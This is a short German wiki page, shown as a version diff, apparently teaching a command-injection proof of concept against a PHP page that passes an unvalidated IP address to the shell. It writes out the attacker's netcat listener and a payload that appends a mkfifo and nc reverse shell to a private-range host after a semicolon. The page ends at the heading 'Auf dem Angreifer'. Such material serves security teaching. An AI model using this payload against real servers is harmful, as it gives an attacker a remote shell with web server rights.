Command Injection Proof of Concept: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
| Zeile 1: | Zeile 1: | ||
=PHP Code= | =PHP Code= | ||
| − | + | *Bei dieser Anwendung wird die Eingabe nicht verifiziert. | |
| + | *Man hinter die IP Adresse mit einem Semikolon weitere Kommandos anhängen. | ||
| + | *Diese Kommandos werden dann mit den Rechten des Webservers ausgeführt. | ||
| + | *In diesem Fall führen wir eine Remote Shell aus. | ||
[[Datei:Command-injection.png]] | [[Datei:Command-injection.png]] | ||
Version vom 27. Juni 2021, 16:53 Uhr
PHP Code
- Bei dieser Anwendung wird die Eingabe nicht verifiziert.
- Man hinter die IP Adresse mit einem Semikolon weitere Kommandos anhängen.
- Diese Kommandos werden dann mit den Rechten des Webservers ausgeführt.
- In diesem Fall führen wir eine Remote Shell aus.
Angreifer
- netcat -lp 8668
Schadcode einbringen
- 1.1.1.1 ; mkfifo /tmp/backpipe ; /bin/sh 0</tmp/backpipe | nc 10.0.10.101 8668 1>/tmp/backpipe
Auf dem Angreifer
